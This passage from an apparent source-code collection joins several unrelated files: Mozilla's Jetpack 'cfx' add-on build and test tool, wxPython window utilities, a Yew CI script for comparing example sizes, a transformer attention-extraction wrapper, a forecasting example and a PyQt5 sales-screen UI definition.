%prog [options] command [command-specific options]
Supported Commands:
docs - view web-based documentation
init - create a sample addon in an empty directory
test - run tests
run - run program
xpi - generate an xpi
Internal Commands:
sdocs - export static documentation
testcfx - test the cfx tool
testex - test all example code
testpkgs - test all installed packages
testall - test whole environment
Experimental and internal commands and options are not supported and may be
changed or removed in the future.
"""
global_options = [
(("-v", "--verbose",), dict(dest="verbose",
help="enable lots of output",
action="store_true",
default=False)),
]
parser_groups = (
("Supported Command-Specific Options", [
(("", "--update-url",), dict(dest="update_url",
help="update URL in install.rdf",
metavar=None,
default=None,
cmds=['xpi'])),
(("", "--update-link",), dict(dest="update_link",
help="generate update.rdf",
metavar=None,
default=None,
cmds=['xpi'])),
(("-p", "--profiledir",), dict(dest="profiledir",
help=("profile directory to pass to "
"app"),
metavar=None,
default=None,
cmds=['test', 'run', 'testex',
'testpkgs', 'testall'])),
(("-b", "--binary",), dict(dest="binary",
help="path to app binary",
metavar=None,
default=None,
cmds=['test', 'run', 'testex', 'testpkgs',
'testall'])),
(("", "--binary-args",), dict(dest="cmdargs",
help=("additional arguments passed to the "
"binary"),
metavar=None,
default=None,
cmds=['run', 'test'])),
(("", "--dependencies",), dict(dest="dep_tests",
help="include tests for all deps",
action="store_true",
default=False,
cmds=['test', 'testex', 'testpkgs',
'testall'])),
(("", "--times",), dict(dest="iterations",
type="int",
help="number of times to run tests",
default=1,
cmds=['test', 'testex', 'testpkgs',
'testall'])),
(("-f", "--filter",), dict(dest="filter",
help=("only run tests whose filenames "
"match FILTER, a regexp"),
metavar=None,
default=None,
cmds=['test', 'testex', 'testpkgs',
'testall'])),
(("-g", "--use-config",), dict(dest="config",
help="use named config from local.json",
metavar=None,
default="default",
cmds=['test', 'run', 'xpi', 'testex',
'testpkgs', 'testall'])),
(("", "--templatedir",), dict(dest="templatedir",
help="XULRunner app/ext. template",
metavar=None,
default=None,
cmds=['run', 'xpi'])),
(("", "--package-path",), dict(dest="packagepath", action="append",
help="extra directories for package search",
metavar=None,
default=[],
cmds=['run', 'xpi', 'test'])),
(("", "--extra-packages",), dict(dest="extra_packages",
help=("extra packages to include, "
"comma-separated. Default is "
"'addon-kit'."),
metavar=None,
default="addon-kit",
cmds=['run', 'xpi', 'test', 'testex',
'testpkgs', 'testall',
'testcfx'])),
(("", "--pkgdir",), dict(dest="pkgdir",
help=("package dir containing "
"package.json; default is "
"current directory"),
metavar=None,
default=None,
cmds=['run', 'xpi', 'test'])),
(("", "--static-args",), dict(dest="static_args",
help="extra harness options as JSON",
type="json",
metavar=None,
default="{}",
cmds=['run', 'xpi'])),
]
),
("Experimental Command-Specific Options", [
(("-a", "--app",), dict(dest="app",
help=("app to run: firefox (default), "
"xulrunner, fennec, or thunderbird"),
metavar=None,
default="firefox",
cmds=['test', 'run', 'testex', 'testpkgs',
'testall'])),
(("", "--no-run",), dict(dest="no_run",
help=("Instead of launching the "
"application, just show the command "
"for doing so. Use this to launch "
"the application in a debugger like "
"gdb."),
action="store_true",
default=False,
cmds=['run', 'test'])),
(("", "--strip-xpi",), dict(dest="strip_xpi",
help="(ignored, deprecated, will be removed)",
action="store_true",
default=False,
cmds=['xpi'])),
(("", "--no-strip-xpi",), dict(dest="no_strip_xpi",
help="retain unused modules in XPI",
action="store_true",
default=False,
cmds=['xpi'])),
]
),
("Internal Command-Specific Options", [
(("", "--addons",), dict(dest="addons",
help=("paths of addons to install, "
"comma-separated"),
metavar=None,
default=None,
cmds=['test', 'run', 'testex', 'testpkgs',
'testall'])),
(("", "--baseurl",), dict(dest="baseurl",
help=("root of static docs tree: "
"for example: 'http://me.com/the_docs/'"),
metavar=None,
default='',
cmds=['sdocs'])),
(("", "--test-runner-pkg",), dict(dest="test_runner_pkg",
help=("name of package "
"containing test runner "
"program (default is "
"test-harness)"),
default="test-harness",
cmds=['test', 'testex', 'testpkgs',
'testall'])),
# --keydir was removed in 1.0b5, but we keep it around in the options
# parser to make life easier for frontends like FlightDeck which
# might still pass it. It can go away once the frontends are updated.
(("", "--keydir",), dict(dest="keydir",
help=("obsolete, ignored"),
metavar=None,
default=None,
cmds=['test', 'run', 'xpi', 'testex',
'testpkgs', 'testall'])),
(("", "--e10s",), dict(dest="enable_e10s",
help="enable out-of-process Jetpacks",
action="store_true",
default=False,
cmds=['test', 'run', 'testex', 'testpkgs'])),
(("", "--logfile",), dict(dest="logfile",
help="log console output to file",
metavar=None,
default=None,
cmds=['run', 'test', 'testex', 'testpkgs'])),
# TODO: This should default to true once our memory debugging
# issues are resolved; see bug 592774.
(("", "--profile-memory",), dict(dest="profileMemory",
help=("profile memory usage "
"(default is false)"),
type="int",
action="store",
default=0,
cmds=['test', 'testex', 'testpkgs',
'testall'])),
]
),
)
# Maximum time we'll wait for tests to finish, in seconds.
TEST_RUN_TIMEOUT = 10 * 60
def find_parent_package(cur_dir):
tail = True
while tail:
if os.path.exists(os.path.join(cur_dir, 'package.json')):
return cur_dir
cur_dir, tail = os.path.split(cur_dir)
return None
def check_json(option, opt, value):
# We return the parsed JSON here; see bug 610816 for background on why.
try:
return json.loads(value)
except ValueError:
raise optparse.OptionValueError("Option %s must be JSON." % opt)
class CfxOption(optparse.Option):
TYPES = optparse.Option.TYPES + ('json',)
TYPE_CHECKER = copy(optparse.Option.TYPE_CHECKER)
TYPE_CHECKER['json'] = check_json
def parse_args(arguments, global_options, usage, parser_groups, defaults=None):
parser = optparse.OptionParser(usage=usage.strip(), option_class=CfxOption)
def name_cmp(a, b):
# a[0] = name sequence
# a[0][0] = short name (possibly empty string)
# a[0][1] = long name
names = []
for seq in (a, b):
names.append(seq[0][0][1:] if seq[0][0] else seq[0][1][2:])
return cmp(*names)
global_options.sort(name_cmp)
for names, opts in global_options:
parser.add_option(*names, **opts)
for group_name, options in parser_groups:
group = optparse.OptionGroup(parser, group_name)
options.sort(name_cmp)
for names, opts in options:
if 'cmds' in opts:
cmds = opts['cmds']
del opts['cmds']
cmds.sort()
if not 'help' in opts:
opts['help'] = ""
opts['help'] += " (%s)" % ", ".join(cmds)
group.add_option(*names, **opts)
parser.add_option_group(group)
if defaults:
parser.set_defaults(**defaults)
(options, args) = parser.parse_args(args=arguments)
if not args:
parser.print_help()
parser.exit()
return (options, args)
# all tests emit progress messages to stderr, not stdout. (the mozrunner
# console output goes to stderr and is hard to change, and
# unittest.TextTestRunner prefers stderr, so we send everything else there
# too, to keep all the messages in order)
def test_all(env_root, defaults):
fail = False
print >>sys.stderr, "Testing cfx..."
sys.stderr.flush()
result = test_cfx(env_root, defaults['verbose'])
if result.failures or result.errors:
fail = True
print >>sys.stderr, "Testing all examples..."
sys.stderr.flush()
try:
test_all_examples(env_root, defaults)
except SystemExit, e:
fail = (e.code != 0) or fail
print >>sys.stderr, "Testing all packages..."
sys.stderr.flush()
try:
test_all_packages(env_root, defaults)
except SystemExit, e:
fail = (e.code != 0) or fail
if fail:
print >>sys.stderr, "Some tests were unsuccessful."
sys.exit(1)
print >>sys.stderr, "All tests were successful. Ship it!"
sys.exit(0)
def test_cfx(env_root, verbose):
import cuddlefish.tests
# tests write to stderr. flush everything before and after to avoid
# confusion later.
sys.stdout.flush(); sys.stderr.flush()
olddir = os.getcwd()
os.chdir(env_root)
retval = cuddlefish.tests.run(verbose)
os.chdir(olddir)
sys.stdout.flush(); sys.stderr.flush()
return retval
def test_all_examples(env_root, defaults):
examples_dir = os.path.join(env_root, "examples")
examples = [dirname for dirname in os.listdir(examples_dir)
if os.path.isdir(os.path.join(examples_dir, dirname))]
examples.sort()
fail = False
for dirname in examples:
print >>sys.stderr, "Testing %s..." % dirname
sys.stderr.flush()
try:
run(arguments=["test",
"--pkgdir",
os.path.join(examples_dir, dirname)],
defaults=defaults,
env_root=env_root)
except SystemExit, e:
fail = (e.code != 0) or fail
if fail:
sys.exit(-1)
def test_all_packages(env_root, defaults):
deps = []
target_cfg = Bunch(name = "testpkgs", dependencies = deps, version="fake")
pkg_cfg = packaging.build_config(env_root, target_cfg)
for name in pkg_cfg.packages:
if name != "testpkgs":
deps.append(name)
print >>sys.stderr, "Testing all available packages: %s." % (", ".join(deps))
sys.stderr.flush()
run(arguments=["test", "--dependencies"],
target_cfg=target_cfg,
pkg_cfg=pkg_cfg,
defaults=defaults)
def get_config_args(name, env_root):
local_json = os.path.join(env_root, "local.json")
if not (os.path.exists(local_json) and
os.path.isfile(local_json)):
if name == "default":
return []
else:
print >>sys.stderr, "File does not exist: %s" % local_json
sys.exit(1)
local_json = packaging.load_json_file(local_json)
if 'configs' not in local_json:
print >>sys.stderr, "'configs' key not found in local.json."
sys.exit(1)
if name not in local_json.configs:
if name == "default":
return []
else:
print >>sys.stderr, "No config found for '%s'." % name
sys.exit(1)
config = local_json.configs[name]
if type(config) != list:
print >>sys.stderr, "Config for '%s' must be a list of strings." % name
sys.exit(1)
return config
def initializer(env_root, args, out=sys.stdout, err=sys.stderr):
from templates import MAIN_JS, PACKAGE_JSON, README_DOC, MAIN_JS_DOC, TEST_MAIN_JS
path = os.getcwd()
addon = os.path.basename(path)
# if more than one argument
if len(args) > 1:
print >>err, 'Too many arguments.'
return 1
# avoid clobbering existing files, but we tolerate things like .git
existing = [fn for fn in os.listdir(path) if not fn.startswith(".")]
if existing:
print >>err, 'This command must be run in an empty directory.'
return 1
for d in ['lib','data','test','doc']:
os.mkdir(os.path.join(path,d))
print >>out, '*', d, 'directory created'
open('README.md','w').write(README_DOC % {'name':addon})
print >>out, '* README.md written'
open('package.json','w').write(PACKAGE_JSON % {'name':addon.lower(),
'fullName':addon })
print >>out, '* package.json written'
open(os.path.join(path,'test','test-main.js'),'w').write(TEST_MAIN_JS)
print >>out, '* test/test-main.js written'
open(os.path.join(path,'lib','main.js'),'w').write(MAIN_JS)
print >>out, '* lib/main.js written'
open(os.path.join(path,'doc','main.md'),'w').write(MAIN_JS_DOC)
print >>out, '* doc/main.md written'
print >>out, '\nYour sample add-on is now ready.'
print >>out, 'Do "cfx test" to test it and "cfx run" to try it. Have fun!'
return 0
def run(arguments=sys.argv[1:], target_cfg=None, pkg_cfg=None,
defaults=None, env_root=os.environ.get('CUDDLEFISH_ROOT'),
stdout=sys.stdout):
parser_kwargs = dict(arguments=arguments,
global_options=global_options,
parser_groups=parser_groups,
usage=usage,
defaults=defaults)
(options, args) = parse_args(**parser_kwargs)
config_args = get_config_args(options.config, env_root);
# reparse configs with arguments from local.json
if config_args:
parser_kwargs['arguments'] += config_args
(options, args) = parse_args(**parser_kwargs)
command = args[0]
if command == "init":
initializer(env_root, args)
return
if command == "testpkgs":
test_all_packages(env_root, defaults=options.__dict__)
return
elif command == "testex":
test_all_examples(env_root, defaults=options.__dict__)
return
elif command == "testall":
test_all(env_root, defaults=options.__dict__)
return
elif command == "testcfx":
test_cfx(env_root, options.verbose)
return
elif command == "docs":
from cuddlefish.docs import generate
if len(args) > 1:
docs_home = generate.generate_docs(env_root, filename=args[1])
else:
docs_home = generate.generate_docs(env_root)
webbrowser.open(docs_home)
return
elif command == "sdocs":
from cuddlefish.docs import generate
# TODO: Allow user to change this filename via cmd line.
filename = generate.generate_static_docs(env_root, base_url=options.baseurl)
print >>stdout, "Wrote %s." % filename
return
target_cfg_json = None
if not target_cfg:
if not options.pkgdir:
options.pkgdir = find_parent_package(os.getcwd())
if not options.pkgdir:
print >>sys.stderr, ("cannot find 'package.json' in the"
" current directory or any parent.")
sys.exit(1)
else:
options.pkgdir = os.path.abspath(options.pkgdir)
if not os.path.exists(os.path.join(options.pkgdir, 'package.json')):
print >>sys.stderr, ("cannot find 'package.json' in"
" %s." % options.pkgdir)
sys.exit(1)
target_cfg_json = os.path.join(options.pkgdir, 'package.json')
target_cfg = packaging.get_config_in_dir(options.pkgdir)
# At this point, we're either building an XPI or running Jetpack code in
# a Mozilla application (which includes running tests).
use_main = False
timeout = None
inherited_options = ['verbose', 'enable_e10s']
if command == "xpi":
use_main = True
elif command == "test":
if 'tests' not in target_cfg:
target_cfg['tests'] = []
timeout = TEST_RUN_TIMEOUT
inherited_options.extend(['iterations', 'filter', 'profileMemory'])
elif command == "run":
use_main = True
else:
print >>sys.stderr, "Unknown command: %s" % command
print >>sys.stderr, "Try using '--help' for assistance."
sys.exit(1)
if use_main and 'main' not in target_cfg:
# If the user supplies a template dir, then the main
# program may be contained in the template.
if not options.templatedir:
print >>sys.stderr, "package.json does not have a 'main' entry."
sys.exit(1)
if not pkg_cfg:
pkg_cfg = packaging.build_config(env_root, target_cfg, options.packagepath)
target = target_cfg.name
# the harness_guid is used for an XPCOM class ID. We use the
# JetpackID for the add-on ID and the XPCOM contract ID.
if "harnessClassID" in target_cfg:
# For the sake of non-bootstrapped extensions, we allow to specify the
# classID of harness' XPCOM component in package.json. This makes it
# possible to register the component using a static chrome.manifest file
harness_guid = target_cfg["harnessClassID"]
else:
import uuid
harness_guid = str(uuid.uuid4())
# TODO: Consider keeping a cache of dynamic UUIDs, based
# on absolute filesystem pathname, in the root directory
# or something.
if command in ('xpi', 'run'):
from cuddlefish.preflight import preflight_config
if target_cfg_json:
config_was_ok, modified = preflight_config(target_cfg,
target_cfg_json)
if not config_was_ok:
if modified:
# we need to re-read package.json . The safest approach
# is to re-run the "cfx xpi"/"cfx run" command.
print >>sys.stderr, ("package.json modified: please re-run"
" 'cfx %s'" % command)
else:
print >>sys.stderr, ("package.json needs modification:"
" please update it and then re-run"
" 'cfx %s'" % command)
sys.exit(1)
# if we make it this far, we have a JID
else:
assert command == "test"
if "id" in target_cfg:
jid = target_cfg["id"]
if not ("@" in jid or jid.startswith("{")):
jid = jid + "@jetpack"
unique_prefix = '%s-' % jid # used for resource: URLs
else:
# The Jetpack ID is not required for cfx test, in which case we have to
# make one up based on the GUID.
unique_prefix = '%s-' % target
jid = harness_guid
bundle_id = jid
# the resource: URL's prefix is treated too much like a DNS hostname
unique_prefix = unique_prefix.lower()
unique_prefix = unique_prefix.replace("@", "-at-")
unique_prefix = unique_prefix.replace(".", "-dot-")
targets = [target]
if command == "test":
targets.append(options.test_runner_pkg)
extra_packages = []
if options.extra_packages:
extra_packages = options.extra_packages.split(",")
if extra_packages:
targets.extend(extra_packages)
target_cfg.extra_dependencies = extra_packages
deps = packaging.get_deps_for_targets(pkg_cfg, targets)
from cuddlefish.manifest import build_manifest, ModuleNotFoundError
uri_prefix = "resource://%s" % unique_prefix
# Figure out what loader files should be scanned. This is normally
# computed inside packaging.generate_build_for_target(), by the first
# dependent package that defines a "loader" property in its package.json.
# This property is interpreted as a filename relative to the top of that
# file, and stored as a URI in build.loader . generate_build_for_target()
# cannot be called yet (it needs the list of used_deps that
# build_manifest() computes, but build_manifest() needs the list of
# loader files that it computes). We could duplicate or factor out this
# build.loader logic, but that would be messy, so instead we hard-code
# the choice of loader for manifest-generation purposes. In practice,
# this means that alternative loaders probably won't work with
# --strip-xpi.
assert packaging.DEFAULT_LOADER == "api-utils"
assert pkg_cfg.packages["api-utils"].loader == "lib/cuddlefish.js"
cuddlefish_js_path = os.path.join(pkg_cfg.packages["api-utils"].root_dir,
"lib", "cuddlefish.js")
loader_modules = [("api-utils", "lib", "cuddlefish", cuddlefish_js_path)]
try:
manifest = build_manifest(target_cfg, pkg_cfg, deps, uri_prefix, False,
loader_modules)
except ModuleNotFoundError, e:
print str(e)
sys.exit(1)
used_deps = manifest.get_used_packages()
if command == "test":
# The test runner doesn't appear to link against any actual packages,
# because it loads everything at runtime (invisible to the linker).
# If we believe that, we won't set up URI mappings for anything, and
# tests won't be able to run.
used_deps = deps
for xp in extra_packages:
if xp not in used_deps:
used_deps.append(xp)
build = packaging.generate_build_for_target(
pkg_cfg, target, used_deps,
prefix=unique_prefix, # used to create resource: URLs
include_dep_tests=options.dep_tests
)
if 'resources' in build:
resources = build.resources
for name in resources:
resources[name] = os.path.abspath(resources[name])
harness_contract_id = ('@mozilla.org/harness-service;1?id=%s' % jid)
harness_options = {
'bootstrap': {
'contractID': harness_contract_id,
'classID': '{%s}' % harness_guid
},
'jetpackID': jid,
'bundleID': bundle_id,
'uriPrefix': uri_prefix,
'staticArgs': options.static_args,
'name': target,
}
harness_options.update(build)
if command == "test":
# This should be contained in the test runner package.
harness_options['main'] = 'run-tests'
else:
harness_options['main'] = target_cfg.get('main')
for option in inherited_options:
harness_options[option] = getattr(options, option)
harness_options['metadata'] = packaging.get_metadata(pkg_cfg, used_deps)
sdk_version = get_version(env_root)
harness_options['sdkVersion'] = sdk_version
packaging.call_plugins(pkg_cfg, used_deps)
retval = 0
if options.templatedir:
app_extension_dir = os.path.abspath(options.templatedir)
else:
mydir = os.path.dirname(os.path.abspath(__file__))
if sys.platform == "darwin":
# If we're on OS X, at least point into the XULRunner
# app dir so we run as a proper app if using XULRunner.
app_extension_dir = os.path.join(mydir, "Test App.app",
"Contents", "Resources")
else:
app_extension_dir = os.path.join(mydir, "app-extension")
harness_options['manifest'] = manifest.get_harness_options_manifest(uri_prefix)
if command == 'xpi':
from cuddlefish.xpi import build_xpi
from cuddlefish.rdf import gen_manifest, RDFUpdate
manifest_rdf = gen_manifest(template_root_dir=app_extension_dir,
target_cfg=target_cfg,
bundle_id=bundle_id,
update_url=options.update_url,
bootstrap=True)
if options.update_link:
rdf_name = UPDATE_RDF_FILENAME % target_cfg.name
print >>stdout, "Exporting update description to %s." % rdf_name
update = RDFUpdate()
update.add(manifest_rdf, options.update_link)
open(rdf_name, "w").write(str(update))
# ask the manifest what files were used, so we can construct an XPI
# without the rest. This will include the loader (and everything it
# uses) because of the "loader_modules" starting points we passed to
# build_manifest earlier
used_files = set(manifest.get_used_files())
if options.strip_xpi:
print >>stdout, "--strip-xpi is now the default: argument ignored"
if options.no_strip_xpi:
used_files = None # disables the filter, includes all files
xpi_name = XPI_FILENAME % target_cfg.name
print >>stdout, "Exporting extension to %s." % xpi_name
build_xpi(template_root_dir=app_extension_dir,
manifest=manifest_rdf,
xpi_name=xpi_name,
harness_options=harness_options,
limit_to=used_files)
else:
from cuddlefish.runner import run_app
if options.profiledir:
options.profiledir = os.path.expanduser(options.profiledir)
options.profiledir = os.path.abspath(options.profiledir)
if options.addons is not None:
options.addons = options.addons.split(",")
try:
retval = run_app(harness_root_dir=app_extension_dir,
harness_options=harness_options,
app_type=options.app,
binary=options.binary,
profiledir=options.profiledir,
verbose=options.verbose,
timeout=timeout,
logfile=options.logfile,
addons=options.addons,
args=options.cmdargs,
norun=options.no_run)
except Exception, e:
if str(e).startswith(MOZRUNNER_BIN_NOT_FOUND):
print >>sys.stderr, MOZRUNNER_BIN_NOT_FOUND_HELP.strip()
retval = -1
else:
raise
sys.exit(retval)
|
python_toolbox/wx_tools/window_tools.py | hboshnak/python_toolbox | 119 | 12669798 | # Copyright 2009-2017 <NAME>.
# This program is distributed under the MIT license.
'''Defines various tools for manipulating windows.'''
import wx
from python_toolbox.freezing import Freezer
class WindowFreezer(Freezer):
'''Context manager for freezing the window while the suite executes.'''
def __init__(self, window):
Freezer.__init__(self)
assert isinstance(window, wx.Window)
self.window = window
def freeze_handler(self):
self.window.Freeze()
def thaw_handler(self):
self.window.Thaw()
class FlagRaiser: # todo: rename?
'''When called, raises a flag of a window and then calls some function.'''
def __init__(self, window, attribute_name=None, function=None, delay=None):
'''
Construct the flag raiser.
`window` is the window we're acting on. `attribute_name` is the name of
the flag that we set to True. `function` is the function we call after
we set the flag. Default for `function` is `window.Refresh`.
If we get a `delay` argument, then we don't call the function
immediately, but wait for `delay` time, specified as seconds, then call
it. If this flag raiser will be called again while the timer's on, it
will not cause another function calling.
'''
assert isinstance(window, wx.Window)
self.window = window
'''The window that the flag raiser is acting on.'''
self.attribute_name = attribute_name
'''The name of the flag that this flag raiser raises.'''
self.function = function or window.Refresh
'''The function that this flag raiser calls after raising the flag.'''
self.delay = delay
'''The delay, in seconds, that we wait before calling the function.'''
if delay is not None:
self._delay_in_ms = delay * 1000
'''The delay in milliseconds.'''
self.timer = cute_timer.CuteTimer(self.window)
'''The timer we use to call the function.'''
self.window.Bind(wx.EVT_TIMER, self._on_timer, self.timer)
def __call__(self):
'''Raise the flag and call the function. (With delay if we set one.)'''
if self.attribute_name:
setattr(self.window, self.attribute_name, True)
if self.delay is None:
self.function()
else: # self.delay is a positive number
if not self.timer.IsRunning():
self.timer.Start(self._delay_in_ms, oneShot=True)
def _on_timer(self, event):
if getattr(self.window, self.attribute_name) is True:
self.function() |
ci/make_example_size_cmt.py | lostinspiration/yew | 8,292 | 12669807 | <gh_stars>1000+
from typing import Dict, List, Optional, Tuple
import os
import json
header = "| examples | master (KB) | pull request (KB) | diff (KB) | diff (%) |"
sep = "| --- | --- | --- | --- | --- |"
def format_size(size: Optional[int]) -> str:
if size is None:
return "N/A"
if size == 0:
return "0"
return f"{size / 1024:.3f}"
def format_diff_size(
master_size: Optional[int], pr_size: Optional[int]
) -> Tuple[str, str, bool]:
if master_size is None or pr_size is None:
return ("N/A", "N/A", False)
diff = pr_size - master_size
if diff == 0:
return ("0", "0.000%", False)
diff_percent = diff / master_size
return (f"{diff / 1024:+.3f}", f"{diff_percent:+.3%}", abs(diff_percent) >= 0.01)
def main() -> None:
with open("size-cmp-info/.SIZE_CMP_INFO") as f:
content = json.loads(f.read())
joined_sizes = content["sizes"]
issue_number = content["issue_number"]
lines: List[str] = []
significant_lines: List[str] = []
lines.append("### Size Comparison")
lines.append("")
lines.append("<details>")
lines.append("")
lines.append(header)
lines.append(sep)
for (i, sizes) in joined_sizes:
(master_size, pr_size) = sizes
master_size_str = format_size(master_size)
pr_size_str = format_size(pr_size)
(diff_str, diff_percent, diff_significant) = format_diff_size(
master_size, pr_size
)
line_str = (
f"| {i} | {master_size_str} | {pr_size_str} | "
f"{diff_str} | {diff_percent} |"
)
lines.append(line_str)
if diff_significant:
significant_lines.append(line_str)
lines.append("")
lines.append("</details>")
lines.append("")
if significant_lines:
if len(significant_lines) == 1:
lines.append("⚠️ The following example has changed its size significantly:")
else:
lines.append(
"⚠️ The following examples have changed their size significantly:"
)
lines.append("")
lines.append(header)
lines.append(sep)
lines.extend(significant_lines)
else:
lines.append("✅ None of the examples has changed their size significantly.")
output = "\n".join(lines)
with open(os.environ["GITHUB_ENV"], "a+") as f:
f.write(f"YEW_EXAMPLE_SIZES={json.dumps(output)}\n")
f.write(f"PR_NUMBER={issue_number}\n")
if __name__ == "__main__":
main()
|
api.py | SIDN-IAP/attention-visualization | 134 | 12669819 | <gh_stars>100-1000
import torch
from transformers import (
AutoTokenizer,
AutoModel,
)
class AttentionGetter:
'''
Wrapper Class to store model object.
'''
def __init__(self, model_name: str):
'''
Each model has an associated tokenizer object.
Load both.
'''
super().__init__()
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model = AutoModel.from_pretrained(model_name, output_attentions=True).to(
self.device
)
self.tokenizer = AutoTokenizer.from_pretrained(model_name)
def _grab_attn(self, context):
'''
function to get the attention for a model.
First runs a forward pass and then extracts and formats attn.
'''
output = self.model(context)
# Grab the attention from the output
# Format as Layer x Head x From x To
attn = torch.cat([l for l in output[-1]], dim=0)
format_attn = [
[
[[str(round(att * 100)) for att in head] for head in layer]
for layer in tok
]
for tok in attn.cpu().tolist()
]
return format_attn
def gpt_analyze_text(self, text: str):
"""
Works for GPT-2 Style Models
"""
# Run tokenizer
toked = self.tokenizer.encode(text)
# GPT-2 generates text after a |<endoftext>| token. Add this:
start_token = torch.full(
(1, 1), self.tokenizer.bos_token_id, device=self.device, dtype=torch.long,
)
# Concatenate the text and start token
context = torch.tensor(toked, device=self.device, dtype=torch.long).unsqueeze(0)
context = torch.cat([start_token, context], dim=1)
# Extract attention
attn = self._grab_attn(context)
# Build payload
return {
"tokens": self.tokenizer.convert_ids_to_tokens(context[0]),
"attention": attn,
}
def bert_analyze_text(self, text: str):
"""
Works for BERT Style models
"""
# Tokenize
toked = self.tokenizer.encode(text)
# Build Tensor
context = torch.tensor(toked).unsqueeze(0).long()
# Extract Attention
attn = self._grab_attn(context)
# Build Payload
return {
"tokens": self.tokenizer.convert_ids_to_tokens(toked),
"attention": attn,
}
if __name__ == "__main__":
model = AttentionGetter("gpt2")
payload = model.gpt_analyze_text("This is a test.")
print(payload)
model = AttentionGetter("distilbert-base-uncased")
payload = model.bert_analyze_text("This is a test.")
print(payload)
print("checking successful!")
|
examples/basic_usage/run_skater_and_return _forecast_error.py | iklasky/timemachines | 253 | 12669820 | from timemachines.skaters.simple.thinking import thinking_slow_and_slow
from timemachines.skatertools.evaluation.evaluators import hospital_mean_square_error_with_sporadic_fit
if __name__=='__main__':
print(hospital_mean_square_error_with_sporadic_fit(f=thinking_slow_and_slow,n=120,fit_frequency=10)) |
controle_estoque/Views/mainVendas.py | jucimar1/controleEstoque | 134 | 12669839 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainVendas.ui',
# licensing of 'mainVendas.ui' applies.
#
# Created: Mon Mar 18 10:46:46 2019
# by: PyQt5-uic running on PyQt5 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_ct_MainVendas(object):
def setMainVendas(self, ct_MainVendas):
ct_MainVendas.setObjectName("ct_MainVendas")
ct_MainVendas.resize(1000, 600)
ct_MainVendas.setStyleSheet("border:none")
self.frameMainVendas = QtWidgets.QFrame(ct_MainVendas)
self.frameMainVendas.setGeometry(QtCore.QRect(0, 0, 1000, 600))
self.frameMainVendas.setObjectName("frameMainVendas")
self.fr_TopoMenuVendas = QtWidgets.QFrame(self.frameMainVendas)
self.fr_TopoMenuVendas.setGeometry(QtCore.QRect(0, 60, 1000, 40))
self.fr_TopoMenuVendas.setStyleSheet("background:#E1DFE0;\n"
"border: none;")
self.fr_TopoMenuVendas.setObjectName("fr_TopoMenuVendas")
self.bt_BuscaVendas = QtWidgets.QPushButton(self.fr_TopoMenuVendas)
self.bt_BuscaVendas.setGeometry(QtCore.QRect(820, 5, 30, 30))
font = QtGui.QFont()
font.setFamily("Arial")
self.bt_BuscaVendas.setFont(font)
self.bt_BuscaVendas.setCursor(QtCore.Qt.PointingHandCursor)
self.bt_BuscaVendas.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_BuscaVendas.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.bt_BuscaVendas.setStyleSheet("")
self.bt_BuscaVendas.setText("")
self.bt_BuscaVendas.setObjectName("bt_BuscaVendas")
self.bt_AddNovoVenda = QtWidgets.QPushButton(self.fr_TopoMenuVendas)
self.bt_AddNovoVenda.setGeometry(QtCore.QRect(900, 0, 100, 40))
self.bt_AddNovoVenda.setCursor(QtCore.Qt.PointingHandCursor)
self.bt_AddNovoVenda.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_AddNovoVenda.setContextMenuPolicy(QtCore.Qt.ActionsContextMenu)
self.bt_AddNovoVenda.setStyleSheet("QPushButton {\n"
"background-color: #7AB32E;\n"
" }\n"
"QPushButton:hover{\n"
"background-color: #40a286\n"
"}")
self.bt_AddNovoVenda.setText("")
self.bt_AddNovoVenda.setObjectName("bt_AddNovoVenda")
self.tx_BuscaVendas = QtWidgets.QLineEdit(self.fr_TopoMenuVendas)
self.tx_BuscaVendas.setGeometry(QtCore.QRect(0, 5, 300, 30))
font = QtGui.QFont()
font.setFamily("Arial")
self.tx_BuscaVendas.setFont(font)
self.tx_BuscaVendas.setFocusPolicy(QtCore.Qt.ClickFocus)
self.tx_BuscaVendas.setStyleSheet("QLineEdit {\n"
"color: #000\n"
"}\n"
"")
self.tx_BuscaVendas.setObjectName("tx_BuscaVendas")
self.bt_PrintRelatVendas = QtWidgets.QPushButton(
self.fr_TopoMenuVendas)
self.bt_PrintRelatVendas.setGeometry(QtCore.QRect(860, 5, 30, 30))
font = QtGui.QFont()
font.setFamily("Arial")
self.bt_PrintRelatVendas.setFont(font)
self.bt_PrintRelatVendas.setCursor(QtCore.Qt.PointingHandCursor)
self.bt_PrintRelatVendas.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_PrintRelatVendas.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.bt_PrintRelatVendas.setText("")
self.bt_PrintRelatVendas.setObjectName("bt_PrintRelatVendas")
self.dt_InicioVenda = QtWidgets.QDateEdit(self.fr_TopoMenuVendas)
self.dt_InicioVenda.setGeometry(QtCore.QRect(310, 16, 140, 20))
self.dt_InicioVenda.setStyleSheet("QDateEdit {\n"
"background: #E1DFE0;\n"
"border: none;\n"
"font-family: \"Arial\";\n"
"font-size: 20px;\n"
"font-weight: bold;\n"
"color: rgb(80,79,79)\n"
"}\n"
" QDateEdit::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 25px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QDateEdit::down-arrow {\n"
" image: url(:Images/Images/down.png);\n"
" }")
self.dt_InicioVenda.setCalendarPopup(True)
self.dt_InicioVenda.setObjectName("dt_InicioVenda")
self.lb_FormVenda_21 = QtWidgets.QLabel(self.fr_TopoMenuVendas)
self.lb_FormVenda_21.setGeometry(QtCore.QRect(310, 2, 120, 16))
self.lb_FormVenda_21.setStyleSheet("QLabel{\n"
"font-size: 12px;\n"
"font-family: \"Arial Unicode MS\";\n"
"\n"
"color:#1E87F0;\n"
"border: none;\n"
"}")
self.lb_FormVenda_21.setObjectName("lb_FormVenda_21")
self.lb_FormVenda_22 = QtWidgets.QLabel(self.fr_TopoMenuVendas)
self.lb_FormVenda_22.setGeometry(QtCore.QRect(460, 2, 120, 16))
self.lb_FormVenda_22.setStyleSheet("QLabel{\n"
"font-size: 12px;\n"
